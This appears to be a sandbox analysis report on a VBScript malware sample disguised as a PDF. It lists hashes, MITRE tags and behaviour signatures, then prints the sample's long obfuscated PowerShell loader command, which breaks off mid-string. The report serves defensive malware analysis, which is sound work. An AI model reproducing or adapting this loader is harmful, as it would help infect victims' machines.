2c3d329a94009f4cb36b5c9f4e79caebd9afbbaddfba592bf3847716bafed2bb

Analysis

max time kernel
187s
max time network
187s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
23-11-2022 13:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

draft_BL_12092022.pdf.vbs
Size

396KB
MD5

7579a297d1fa9c0c01cd6aac9f914317
SHA1

d50f37645bd0ae8ff35ee933da6e3a7dbbf58d5e
SHA256

2c3d329a94009f4cb36b5c9f4e79caebd9afbbaddfba592bf3847716bafed2bb
SHA512

692f436c18e23aa049ff60d4296d9dd4bdc8c76a4feae438cc05f8bcf91b613a87b8e882c2fed7647656a00eb9f6a3248018123c15cfc5a7e272f060ab9bfc40
SSDEEP

6144:V7d12lB1OzvzbgIxlmQRevRlApKDGjNTH7Wn7LltrUP6gkVk3fhvkQOACCXL:Br2lB1Oz7kIxOvPApwGjNfKrj9OfpLX

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

3380 powershell.exe
3380 powershell.exe
4616 powershell.exe
4616 powershell.exe
3808 powershell.exe
3808 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3380 powershell.exe
Token: SeDebugPrivilege 4616 powershell.exe
Token: SeDebugPrivilege 3808 powershell.exe

pid	process
3380	powershell.exe
3380	powershell.exe
4616	powershell.exe
4616	powershell.exe
3808	powershell.exe
3808	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3380	powershell.exe
Token: SeDebugPrivilege	4616	powershell.exe
Token: SeDebugPrivilege	3808	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2912 wrote to memory of 3380	2912	WScript.exe	powershell.exe
PID 2912 wrote to memory of 3380	2912	WScript.exe	powershell.exe
PID 3380 wrote to memory of 4616	3380	powershell.exe	powershell.exe
PID 3380 wrote to memory of 4616	3380	powershell.exe	powershell.exe
PID 3380 wrote to memory of 4616	3380	powershell.exe	powershell.exe
PID 4616 wrote to memory of 3808	4616	powershell.exe	powershell.exe
PID 4616 wrote to memory of 3808	4616	powershell.exe	powershell.exe
PID 4616 wrote to memory of 3808	4616	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\draft_BL_12092022.pdf.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kaktusplanter = """UnFHuuUnnBrcUntAmiOcoSunDi ziHPrTEcBCr Af{Ri Co Bi Sl DapSuaStrInaGumPo(Sp[AdSTrtIlrPoiWinCogSl]Fo`$FrHPaSId)Al;Fa Oc Br Su Al`$KrBWiyUntPeeStsDi Al=Ne UnNOveOpwBe-PeOInbCijPreNecFotEk MobReybathaeRa[ra]Da Fo(Xe`$FrHfoSGu.BrLAfeDenFagDitUnhVe Bo/In An2Re)Ge;Ng as Kv Te UnFNooForUn(De`$CiiAr=Se0Si;Ce Om`$TaiTe Se-SelBrtPr ho`$DiHWeSTr.BrLBjeTenOvgFrtDrhDe;Kr Po`$drica+Sy=Bi2Ba)Ph{Hk He Ji Mi Fo Di Av Fo Bo`$PaBRdyCotQueBrsCe[To`$SaiRu/Mi2Be]Pa cr=Cu Ov[PacKuoKanatvMoeParSmtSc]Bl:En:NoTEioHeBEfySttPreBa(Ps`$UnHLnSGa.CoSSkuPabVasMltRerPliKanSegSh(cr`$FriXy,Pi My2Sk)Be,Ud Na1Hy6To)Ad;Em Si Cu`$icBUsyUdtCoeBesIl[ra`$KriSe/Co2pr]Da Pi=re Va(ka`$BuBReyExtAgeFasFr[Fe`$DeiSn/Ap2Sw]Du re-HebSnxdioDerIn Da1Cr5Ty7Kn)Si;Ma Kr da Fj Su}Ne Sp[FiSEptSqrOuiPrnergGe]Un[coSAayCosExtRoeSomZy.NoTAneWhxbrtLu.FeEAlnRecseoVidTiiUnnBlgFi]Di:Bo:ChASaSkoCAnILiIMo.KoGHueHotDiSImtEdrDeilynPogHe(af`$GebJayArtRaeFosFo)Sk;Uo}Ov`$BrNFooSjrNomUdacalPsiMisFrfArbFrrTe0Ar=VkHTeTCiBSt Va'PuCToEFiEBo4PiEDiEkaEBe9SuFRd8hjFFl0IgBLa3AcFIn9EkFBa1BlFSh1Ne'Li;Ma`$FoNCaoTorUbmBeaEnlFoiBrsanfDibinrst1Fi=afHEkTFoBfa Re'InDDd0SeFEy4TeFSaEwaEPrFGiFAn2GrEFoELuFCa2OpFDiBEgEIv9NuBMe3HiCDaAToFDh4StFWr3AsAAuEnoAcaFouBKi3ReCJu8HuFVi3CoEGaEOpFSkCOvFSeBSkFBy8CeDBr3CaFfrCHyEUn9PaFki4MyEFoBExFKu8grDEp0faFTo8TaEOl9OpFAn5OmFPe2PaFRe9SeEBeEBr'Zi;Ph`$feNUaoLarUnmDeaSnlSoiSpsStfClbSlrPr2St=InHToTReBli th'LeDWhAUdFRa8BiEFo9GlCGiDFlEEkFBuFRe2SuFFlEHeDKiCMiFUv9BlFOb9ChEUnFYdFTi8ulEveEMeEAbESq'Sh;To`$FoNRooUnrkamGraUdlNuiLisLafAfbharVa3Ma=ToHErTGtBTr Ku'BaCEsELyETa4HuEBrEReEAt9EnFel8BuFLo0SoBWa3PrCAiFSnEFi8naFFe3InEHe9woFSt4FjFAm0SaFSt8SpBMa3epDci4SuFGe3MiETv9skFCo8BlEThFUnFun2AdEPsDTiCOpEEnFIm8LvEOmFEpEBiBvaFGa4SgFDeELnFFr8AfEPrESpBun3knDGy5EiFDyCPrFDi3DeFVa9ToFDe1SeFch8buCReFFlFgu8FiFWaBNu'Um;Ra`$DoNAmoCerstmDiaHelDiiPrsCyfEfbDyrca4Ju=CoHFlTOfBTr An'NyECrEShEBr9DiEBaFPhFaf4frFZe3VrFTeAAf'am;Pr`$klNTioKirKamDiaUnlOriResNofFabTurNa5Hi=SkHtrTVaBDe Mi'PrDMeASpFBe8TrEMo9feDTo0EvFDe2BaFFj9GeEFo8ToFCa1LeFkb8SeDLa5meFNoCPoFAp3ArFDe9SiFRe1KnFBi8Vi'Fr;Pr`$OcNTeoSkrHammiaUnlAliErsBlfInbEmrgi6Az=CrHMaTCrBBl Fo'BuCSeFFiCIn9CoCBoEAcECoDAnFMo8ReFAmEskFSo4OvFKoCTaFAd1GeDhe3PrFFiCBaFRa0SuFAf8suBQu1PlBUnDOmDTr5piFPl4UbFUn9CaFHe8DaDKvFCuEAs4foCElEcrFIn4reFUnACrBBy1baBInDAnChoDChEIn8guFBiFSaFTi1KoFMe4RaFTyEBa'Po;Aa`$PrNLjoRerHamDraSvlPoiHusPrfSubStrTr7Ov=HaHTaTFlBRe Ra'MeCMeFDrEDu8akFHe3raEHa9HuFBa4SvFSl0toFHo8BlBBa1ZiBKoDSaDst0TiFFlCDoFOd3KrFKoCBeFUnAUnFun8TeFHe9Pe'so;Bi`$FuNCaoEbrPamKoaTilDaiMesBafBrbGerOp8Fe=BlHStTIbBGo Ue'ImCUtFSuFHu8PoFSuBFiFAu1OpFJu8DiFTrEUdESa9EnFWo8QuFHo9OrDCo9GeFCa8FlFSl1DoFHy8EnFReAHuFQuCPrETr9soFLa8sv'Co;pr`$GeNLsoMorUdmFraHulUliLasTefSkbUnrco9Fo=TaHAsTOfBDo Sp'MaDPi4OvFBr3AfDFo0ToFFr8MiFUd0MoFEx2trESkFMaECo4spDpr0KrFho2FoFKa9ReESc8eqFAn1PoFAs8In'Kn;Hu`$LaBOiiBusTrtliamenafdShsFrvMirRigReeElnEa0Ba=CaHBrTTvBCy Bi'AtDSe0FoENe4JaDBa9KnFKo8AbFSu1TiFSt8ruFDuACaFDiCskERa9AcFMe8AkCCe9PoEMi4KoEJoDGlFVl8Sp'Br;Be`$GaBTiiunsFdtAkaSanPidkrsAnvTerKlgKaeScnUg1Hi=BoHsiTWiBSl Ep'HeDAkEUnFFe1AlFUeCNaEEgEinEDeEReBTo1ExBKoDReCCyDRaETr8RiFTeFJaFIn1PrFNo4BaFDyEBrBCr1LeBApDFoCDeEGsFSl8MoFSkCHaFBi1ShFAf8FrFKa9BlBSa1VeBpoDDeDAzCRuFEr3AlEImErgFEm4GiDPeEBdFBi1TrFprCAnESlEMoESuEJuBal1DuBsaDHeDSnCHaERo8BrEMa9CoFMa2UnDPrEUnFSt1ClFUnCFoEDiELrENoEIn'Ch;En`$DaBStiGasTatEkaFinHedNosdivVorVegNeeGrnCe2Ap=DyHPaTSaBBl An'HaDOc4CuFVa3CoEThBDoFTr2BeFIt6BmFSa8Uf'Ho;De`$GiBReihisRitHaaHenCodSesCovRirPhgAfeUnnce3Br=VaHTrTTrBEn um'ThCQuDBeEOm8PoFTrFBuFAl1PeFUn4TaFSaEVaBBe1taBGlDreDJo5ReFHa4RiFPr9AfFRe8HeDSpFVoERe4HeCOrEArFSt4UnFKlALaBSk1TeBRaDBuDIn3NaFNi8LeEDiADoCAcELaFBr1KaFfa2isESe9SuBBe1EsBMaDkoCFoBEfFNe4StEKaFMoETe9ToEBi8UdFFoCJeFHa1Sa'Ab;Ga`$FoBJuiSusEmtReaMindydCasBrvBorUngCieUfnAn4Vi=NoHNoTLeBMe Pe'OvCMiBAdFSc4UdEReFApENo9TaEUn8BeFSkCFoFHu1AnDIdCBeFCa1myFPe1RaFAl2GrFYnEIn'St;Pl`$SiBMoiHesBetUnaFunEpdunsafvLnrHogDaeHanPh5Am=GuHSaTStBTu Mu'LeFVe3MeEIn9GaFTr9PrFDy1AaFba1Na'De;Re`$ToBEniBesDetAvaBanStdMesGrvHorEigBeeNunUn6ek=PaHKrTUaBWe Ge'IgDGr3StEDo9GyCViDPeECuFHeFRe2JaEMi9CeFvi8SvFArEliESu9CoCbiBReFCu4SoEhjFAfETr9ReESk8HoFUnCunFMo1HaDda0liFSy8CoFBa0FiFAg2AgEemFSeEPr4Ad'Pi;Ov`$FlBReicosTatSkaFrnStdPosFevLarPagBrefanPr7Lo=BaHViTHoBIn Sa'BuDUn4soDOv8GeCKu5Te'Re;We`$UnBEaiClsAntPlaBanundStsaivStrSigRueChnRa8In=TuHFlTbeBAg An'LaCDe1Ox'St;maSFueXatSk-ReASklBeiSkaOpsRy Ne-LsnWaaTomTreAf DiBIniMisBrtPoaMenTodDesDevNarTrgvieAbnco9Si ku-FivGnadolDiuTueFe Ny`$SlBAsiBlsVetHoaHenUddResUfvFirOugMeeInnBr7Bi;AafNruSenRecTatFeigeoRinBr UdfIskhopSo Tj{CoPAdaUnrSpaGemBe Vk(St`$FevVe_SnmGr,Me St`$Tevan_DdpTo)Ol Ac Bo Ga Su Af;Re`$AkTKarKaaHufTriAlklimOdibrnBeiKesVatPieTartiiUnuDrmVisEl0Un Po=NeHSmTUrBKi sk'UsBAd9ScEUnBSaERo8TeFTe3DaFbr0DeBStDBaAWi0DdBMiDNoBdi5PaCEu6AaDSeCStEEnDPaEDoDleDMa9VeFKl2SyFVa0GiFRuCspFBl4SaFgr3LaCAl0RoARe7RaASk7BeDIlEUsEfi8SuEMaFLoEcrFExFOb8TuFMa3HuEDe9MeDun9BrFUl2PaFOl0InFKrCOoFMi4SdFBu3BrBRo3FoDDrASuFEm8BoEIn9JeDAfCinEMaESqESjEThFJu8FaFPo0InFUnFFjFCe1CiFUn4SuFBe8OvEViESuBEv5MaBGe4UnBMuDFaEOm1InBHyDLoCGrAMuFAo5MiFSi8MaESoFIlFPo8TeBEk0ReDSt2taFDeFPrFOv7ReFGl8UnFLuEHaEan9RdBAmDStESt6HuBStDCoBMi9AgCBi2tyBWo3TvDBoABaFFa1BiFPe2StFRaFMaFPrCSuFNe1SuDReCTeEAnEUnEEqEUdFTr8PoFSa0CaFNoFFeFSk1JuEIn4SpDSjEHoFnaCDoFFlEPeFSe5hiFFi8CiBSnDflBDi0HyDLaCHvFBe3TiFfi9HyBBiDSaBDi9HjCPr2LeBTe3SeDka1brFSt2ShFUnEflFCrCSdESk9SiFBl4StFRo2reFSo3TaBPa3InCRuEseEChDPeFPy1UnFLu4OvETa9TjBFy5DeBNi9PsDDoFSyFMi4FuEBeEHyESe9FlFFoCFlFme3kaFsn9ReELaEveEStBKaEFeFkoFPoADiFCh8CoFKa3MiAPr5NeBPr4AnCBe6SkBYe0OvAPoCStCma0SkBLa3noDOp8BoEWaCInEbe8SkFTeCLaFKa1OvERiEAlBPr5SoBMi9ExDKr3FlFCo2ekEseFViFUd0EiFVaCArFIs1KaFMe4AlETaESiFAlBFnFReFPrEByFHjAFeDceBCi4PoBQuDStEac0SuBVa4spBTr3DaDShAAfFAy8NyEve9RiCGr9VeESt4ByEAlDDeFPo8HoBSe5drBPr9CoDNo3LaFSo2GaEfoFflFBe0YeFbkCSvFBa1SpFUt4UnEMoESyFTaBTrFSaFBrERaFReACoCBeBCu4jo'Ho;IrBPoiWisTrtDaaDinPidChsCovBarnogGreBenTy9Ha Du`$SkTBorTraRafCiiTokLomAdiInnCoiRisUntPaeUnrNoiUnuTumPesYd0Na;sa`$OmTStrTiaSefAdiWhkgamtiiTinNoiPesHntPreJorLaiCyuFomFisUn5Ti Tr=Un BaHLiTRyBIn Lo'UsBIn9flEudBCoFReCStEKiFStCPl2PoFChAsnEFiDHoFUdCChBPrDHuASe0UnBReDFoBHe9SmEWeBNoEUn8AtFMo3CoFUn0caBTi3tjDDoALiFAg8MeEOv9DoDfo0NeFLo8ReEAr9MaFEn5RaFTr2AfFRe9ErBSk5TkBMa9DrDGr3MaFIn2AfEIsFdiFNr0InFFuCDiFAn1SqFNa4drEUnEAeFBeBBeFOvFSvEToFfiAIrFBrBUn1HoBSaDObCKi6AmCFi9spEMa4AdEBrDReFCa8FlCsu6KiCKu0LoCKo0SiBEmDAlDKrDOvBPo5PhBSk9PrDDr3ThFTj2BiEChFadFUn0ryFOmCHaFIn1SoFSc4PrEBoEKuFDrBNoFNiFOvEFiFMiAorEBeBFo1FoBVeDchBDr9GaDSt3OvFDi2SuEAnFMaFLy0UnFFoCBoFsi1RiFSm4UnEDyEreFFoBSoFaxFAgEPoFudAte9NoBRe4OvBLi4Ra'Sh;WoBHiiKusgutBeaNinEldTisObvKerRegGleAtnFo9st Bi`$AnTCarBeaLefSpiMokEfmAuiarnBuiBasMatkleMurAciSvuPrmFesDo5Pa;Si`$boTAcrMoaEnfPaiCakMomMiiMunLfiGosPatGaegerTriVauStmBrsFe1Be Is=De fuHdrTAbBIn pr'EgEstFAfFnl8HoElo9HoESi8MaEaaFJoFNo3OpBTrDPeBCo9ClEthBAsFSaCStETiFCtCLa2BeFDoARuEUnDVeFSaCEsBwa3SeDAf4PiFLa3ScEToBBlFDi2FoFBe6SkFSm8CrBAn5AsBFl9SyFRe3GaETa8ArFGa1HeFUn1SpBNo1BoBRuDWiDCaDOpBMo5FrCFl6CaCMeEAaELe4CyEfaEGlEFo9ReFSp8FrFBa0AnBFr3ReCkrFElEOm8ThFDa3WaEUr9SkFVa4StFCu0PeFTe8TeBId3FaDDi4CoFbr3beESp9PaFRe8PrEFoFOvFMi2FlEEnDHeCDoEHoFCo8anEFoFGrEDiBCoFHo4krFPoEQuFDe8DeEBoEArBYa3StDHa5KrFApCWaFFa3SsFPe9GhFWe1DeFPo8SoCUnFNeFGo8BaFDiBExCPi0OuBSy5MaDNa3foFDa8HaEVeAOpBTr0SeDTo2AnFJoFanFOu7ldFAf8InFLoEUoEBi9WhBBiDdaCPlECoELa4OuEDaEUaEUn9TeFRi8SaFGr0AuBUt3DoCStFInEBl8EnFMe3PhEtr9FrFFo4ReFCh0VrFMa8EnBMi3CoDBo4BaFBl3MaEDa9AvFOb8TeEMeFLuFFr2UnEUnDpaCIsENaFPn8WhECuFSiEBvBesFAb4OvFClEAeFKo8PaEVeEBrBRa3TaDBo5BoFFoCKeFUk3AsFGr9rhFla1CoFSt8FiCSnFPrFVi8GrFCiBBrBKo5BeBOd5BrDSe3KnFTr8StEKrADeBov0EnDGe2FiFHaFMoFSk7EpFli8HaFReEArEpa9FoBHeDBlDKl4MeFOp3tfEov9PlCNaDAnEMa9SuEVeFAdBBe4veBKo1HaBNaDEkBGa5MaBKo9KrEGrBPhEPo8SpFSi3UnFun0OvBFu3PsDTaADeFSp8PsEIn9MiDIn0ReFSe8ChEAu9FoFTa5CaFDj2FaFEc9AnBLn5HoBGe9OvDmo3AfFIn2coEJaFEcFAn0CoFSmCNkFSe1GoFSe4AsEDyEOpFRaBFaFGlFGaENoFBrALi8RuBPe4paBFu4AfBPi3KhDMe4ReFMa3FoEInBCiFFo2UnFNi6jaFLa8NoBMa5InBEk9soFPo3urEEx8ReFWa1ExFDi1EvBFa1PoBDiDSeDRoDBaBWh5NoBRy9UrEStBAdCPe2SkFRi0UnBIm4DiBKa4CaBAe4AnBOr4HeBJv1MeBAtDPsBTu9BdEAlBBaCdi2asEPrDFeBYa4TyBRe4Pa'St;AgBKniObsUdtLaaKonAcdUisTavSwrCygReeplnSp9Ie Me`$DiTBerFraFifReiDokJomRaiBonEmiJysHotReeOvrcoiKauPamTosEs1Se;Af}VofSnuCanAncNatBeiRaoHenov GeGVoDReTKo Di{BrPoraInrEsaNomsu Fa(Ud[AaPJaaLarPsaMamSteSytKeePerWe(GePthoUnsSpiAntDuiGroStnUd Ud=Bo Sh0Ha,Bu EnMSoaKenNedPaaTotHaoEnrUnySp Bl=Pr No`$MiTMarFruAreFo)Kn]Gi Po[PoTsmyBepDieUn[St]Ko]Re Fo`$InvClaFrrPe_XipRaaOtrJaaovmDueFetSkeNorDisEn,st[UvPGuaTrrSaaInmRaeThtIneDirEl(KrPTaoAdsgaiZatVaiCrohjnUn ad=Pl Ud1Tw)Fy]Da St[OvTDeyHapFreMa]Ku Pu`$KovMerAutpe Ph=Ec Ej[KeVLgomiiGrdFr]di)No;Ko`$foTVorQuaHofExiUnkFrmCaiEknAlimosBdtSleUdrIniJeuFomHjsLs2Wi La=No UnHHaTVeBau Al'clBBr9InCDeBNoCFo9DaDSuFInBanDTiAAp0ChBBrDKaCTa6DiDTuCCrEVaDelEUnDOpDal9slFOp2EwFLa0DiFReCApFSo4suFSe3tuCTa0MuAwe7GuAUk7unDViEAfESc8TrEAdFFoEKrFEnFLa8MuFOp3YdETh9ViDEc9PaFEn2BaFSt0OvFSeCExFUf4DoFry3uoBHo3JeDBe9StFAn8OpFkaBorFPh4ChFTo3FiFJo8FnDMa9KvEVe4TaFSu3YiFGsCSaFHe0AmFDi4LuFReEKaDPeCPrEStEReESaEHyFAl8boFOk0SkFseFNaFdi1UdELe4CaBUd5LaBVi5RaDRa3kaFMi8DiEPrADiBHi0FoDAf2SyFInFTrFTa7WaFMe8VaFFkETrEle9KaBudDatCCoEPrEFo4TeEPlEIbEDr9TaFRo8KiFPs0BuBTi3NoCInFCsFPr8TeFJeBPrFSk1paFRe8EfFNoETeEDr9PsFUn4AaFPa2vaFPa3DuBKo3ArDAuCAfELiEMeEUnEBoFRu8ArFHi0GiFQuFNoFLe1reEFe4ThDSe3SaFTeCTiFPa0LiFOv8MyBTa5LaBNa9ToDFo3PaFFi2InEsaFFoFIt0UnFIrCCnFVu1LaFCe4soEImEflFBrBhoFprFChESpFPyAKl5AfBFr4PaBPs4BeBen1WiBblDTrCCo6BoCGaEPrEHa4HyEBoEReEGi9UnFKe8WaFIn0InBCh3ReCSaFarFMi8TrFStBGuFEu1IrFAs8AdFFdEDiEEs9LyFIn4sjFKa2XyFFr3DoBBe3SjDMi8VeFBr0foFHa4KoEMy9TjBHy3CoDPaCCeEstERoEStEknFUn8ToFRe0puFGlFHyFDi1UoESl4PrDWiFUpETo8DiFDo4MaFFa1BrFMi9ScFAr8WoEGoFSkDgeCTrFseETrFErEBoFSe8BoEAnEFeEKlEBoCQu0NoASc7DiAOp7StCImFPoEHo8CoFSu3TrBAt4HoBRa3PoDHa9noFPr8SeFStBCoFka4DdFPr3SkFFo8RoDTv9VeEGo4esFPo3RaFLaCByFOp0RaFMu4IvFStEEgDFo0InFSe2RiFTr9FuERa8VaFBe1GrFre8MoBHy5PiBCo9ReDHu3HeFSl2DiEBeFSkFRa0FoFAnCWoFDe1SuFTr4SoEpsEOpFUoBInFHvFFaEWhFLlAUn4NoBKr1ReBSlDVaBSa9KlFmoBStFOiCFoFSm1goEDaEDeFUn8CoBTr4EmBRo3StDEn9ViFFl8epFEfBSvFBe4TeFWi3ExFCh8ClCEg9CaERu4HaEBiDShFBl8SkBWr5HoBKo9SeDKuFUnFRy4ArESuENoEPo9PoFShCHoFFi3LeFCe9AgEflEIcESlBGrEMiFGeFHoAUoFLa8SyFMi3AnACaDAmBCe1TrBInDPoBSm9ThDRoFNoFSm4ApEOcEPrEPr9LaFArCAfFTr3LeFSi9HoEbeEPaEHaBWaEInFDeFPeAAbFJu8biFCo3faAGoCunBUd1TrBTrDImCUn6MoCHiELaEBe4VeEUrECrEtr9BoFVr8TeFCr0DeBFi3AcDGa0BeELe8TeFNo1VeESp9FiFSc4TiFKvEEpFVeCStEArEUnEOv9NaDKi9SpFUn8CoFFa1WeFBo8EnFChAPhFHoCHyECe9StFUn8BuCCh0SkBAn4He'ne;spBBaicosCotAnaOvnkodStsGuvElrAngKaeTrnAr9om En`$AnTDirHvaDrfReiEtkAymTriLgnFlidisAftEkeMarBiiMiuInmMasOf2Re;Su`$KoTVirDraInfUriHokBomMoiAgnpriVosCytMiePhrAniSnuagmDesHa3Hy Sy=To UnHOdTTrBSm Fl'LaBKu9StCAnBThCSt9GeDVeFplBDe3TrDTi9EnFRo8MaFScBMeFBl4DrFSh3BeFNi8KoDTaEFlFFl2FiFFo3udEStEWiEst9ShEFaFViEPl8ZoFLeEMaESo9UtFLo2TiEAnFLiBRi5MaBCa9PuDJv3PeFHy2ReEInFGeFIn0SkFSkCWhFHy1ShFHa4AnEUnESoFUnBUdFKaFUnESaFWhAMeBPeBUn1SoBInDInCEk6LiCBhEPeERe4ScETaEchEMe9RyFBi8CaFUn0TrBPr3VaCInFReFNa8MaFCoBDeFAr1CyFFi8MaFchESiEbe9UnFGa4ArFBe2PrFOp3OpBUd3MeDRiEFaFKlCCrFSk1ClFUn1neFTa4MiFko3ArFMiACoDBuEGeFSu2HoFBr3TeECoBTeFSo8EnFPr3AdEAn9stFIm4DaFco2TiFEr3RoEFeETrCSa0SyAIn7orAba7AmCChEUsEFo9FoFHeCSiFHr3ReFCo9OxFKaCmoEKiFRoFha9UnBMa1UfBJeDUfBCa9MoEViBAmFMeCpeEfnFRoCDe2FoEAnDBuFSeCKnEjuFFoFUnCMaFGg0GyFOv8PhEun9afFto8GaEKeFDaEslEBaBCh4UdBNi3HjCIrEvrFPr8BeEUp9DrDHi4CaFDu0UnESaDSoFTo1CsFAk8PeFna0FuFAf8UdFUn3stESa9unFUgCCoEAf9trFKr4DeFPr2ReFHu3AxDVaBHaFSj1AnFHeCPaFCoAPaEInEenBLy5YiBPe9UnDAk3OmFSw2CoEInFUnFfl0HuFCeCepFDe1EnFFa4SlESiEHyFDeBScFNoFarEMaFStAInAReBSi4De'Ps;LuBPlitosTitUnaCrnPrdFosdjvHerBagBaeStnAf9Sa Fo`$HoTHirSiaLofauiBrkWhmtoiTonTaiMisPrtRueMgrThiThuOvmUnsEk3Un;an`$AmTSkrEgaLafRuiUnkGrmAliInnKliKasBatUaeDorFiiAduNymFrsbr4Si Ud=Pr WeHSpTBoBdo Lu'VoBar9ShCJoBSuCAd9AmDSkFSeBHs3SaDpo9smFCa8PrFFaBdiFTe4MaFPr3NeFkn8ChDFi0FeFno8PoEFr9EsFAn5MaFPl2KeFAp9UnBUn5HyBSe9taDTrFOuFDe4FoEHjEAuEKv9GeFTaCHeFBa3PeFSh9KhEUbEPoEDiBhjELeFBrFMuAKeFAn8ruFTh3SnASpFBuBop1MeBIrDDeBFo9ChDMuFFaFPl4DaEPrEaiESa9InFSuCFrFNo3KnFNu9UdECoEFdEOcBmnEapFVrFBlAsoFRe8BeFUn3SuALsEFoBSo1QuBPrDArBSe9CaELaBHyESeFKaEPo9ArBpr1GrBUpDGaBSk9AmESlBdiFBaCAfEAcFRuCvr2TaEDyDNoFSeCUnEScFDeFHoCreFKe0HeFDe8AfEFr9StFve8GoEDiFAnEAlESaBSu4KiBLa3SpCBiEApFPo8FaESh9AmDTi4FoFVi0MuEMuDSoFIm1PhFSo8PrFGe0ReFMu8GoFAa3NaEBu9UnFtiCAbEBr9CoFBa4BoFEp2CaFAr3GaDFoBToFKi1ObFPrCAfFGeAVeEDeEBrBKo5DaBRh9EkDTy3OvFSt2DyEFoFSkFCh0AgFDaCHaFLu1ViFKo4InEMoEAkFCiBPaFInFIlEPiFDaAEsANuBIn4Ch'De;GrBUniKlsTrtUnaRenDodOrsAnvStrPhgpreLunAp9Ma Fe`$MaTRuranaRifPeiFokaumUniRenMeiDesTytOveWirUniDeuAfmTusPe4St;Dy`$SpTKorhuaPuffrirakremTaiPonRaiMasFotSaeAxrLiiHyuApmMasOt5Au Pr=ma ExHMaTFoBSa To'UnEBoFEgFEl8ChERe9SeEHe8SuEFlFnoFEm3VeBIsDBrBhe9GnCMaBAtCSa9ElDMuFScBMa3PsDKoEDaEUnFReFKl8GoFBrCreESp9DaFTa8VaCJu9UnENa4TeESvDPrFSt8LiBDu5TaBan4In'Su;HaBBiiOuspatauaPanLwdAlsravPerBrgTueLenHi9Su Sk`$AtTHtrYdaPifToiBukKamPriOvnLuiKosErtReeurrKniCauTamQusCo5Sa Ad Wi un;Mi}Ed`$FikRekSv Ud=Tj CoHCoTBoBKi Pl'EnFMa6BeFBl8FeEElFWaFHm3HaFCi8TiFBy1GuAFlEOmANiFFr'Tv;Ve`$BeTnarsmaWhfKaiErkAfmPtiMinSeiMasRetSueFlrBiiUruTomLosMi6Oc Af=Kb InHFoTAdBFo De'TiBEs9OvEAlBspFsvCtaEriFOxCOv2EuEArBMaFFlCmiBEnDJaABl0haBSoDFiCCr6frCSpEBrEAt4UnEInEUnECe9DiFBa8PrFFa0EkBEn3ByCAdFUnEPy8PhFyn3TeESt9MoFAr4OmFFi0reFLa8PrBBl3CoDEa4LnFBo3VaEBe9BeFFl8UnEWoFHjFNo2stEGuDUnCSuEGeFPr8DiESaFPoETaBMiFve4UdFBeEanFRg8UnETaENaBUk3SeDTi0LaFTaCEnEBlFSiEmeEReFKa5BiFCaCSkFMo1saCTo0GrAEn7BlACu7PrDNoAFoFRe8alEat9KoDEd9WhFNo8plFRe1AdFUn8TrFToAReFMaCBaEFe9ElFLi8ArDFrBEmFCa2AlEDoFBrDDeBBaECl8PlFNo3LiFCoEHaESt9LaFLo4MoFbo2CoFHi3TaCWeDOfFSl2UdFDi4ExFBl3KiEBa9GeFRe8PeEKoFPjBEr5kbBFa5EnFOvBReFsi6BiEBkDChBCaDdoBOp9AlFEp6DiFRe6JoBPeDmeBSj9CaDTeFSaFZo4KaEBrEFeECo9StFBeCGrFEt3HoFCa9BaEGaEGrEGeBScEDeFStFBaAFeFst8DaFBa3MoAKr9PeBCa4GaBkl1JoBDiDDeBTi5AfDGaAAdDTr9drCTh9HeBScDDeDOpDNoBKr5CoCTi6ShDFo4UdFBo3UnEBr9TrCcoDNoEAl9flEVeFSkCSk0auBEn1PhBMdDCrCHo6SkCBu8BeDGr4BeFBe3VaEke9prAUrESuANoFReCta0BiBSk1SvBSnDFlCRu6raCBl8DiDAf4UdFEn3AsEFo9PrASoEAlAOvFSeCPy0BuBba1RuBVrDLaCSm6FeCIn8CoDHi4EaFPr3CeELe9CoAMoEGrAInFMaCFl0FoBTo4PrBKaDSlBCa5SuCbr6RoDPa4HuFBg3MeESk9TrCPaDHoEMi9DuEUnFAaCOu0SaBAl4SlBHy4daBOn4Ra'Al;ThBiniKlsDitSaaSenMadAnsSkvInrKogbiePonUn9Sk Ca`$BoTUkrAkaPofRaiNokCimNoiChnSkiMisSktPieSprStimouInmSysEk6Al;De`$mevSaaChrAs_fonHutOv An=In TyfSukSepRe Fr`$AfBOpisusFotReaChnFedTasexvSmrAngTreexnPh5Tr Al`$EsBBaiUgsEltMuaCrnLidStsRavGrrLigSeeJunSe6Tr;Re`$SaTTarPaaTrfUpiAbkScmaniJenApiLnsAltSkeMarAmiBauElmLisba7Ra Lu=da StHKoTFrBGa 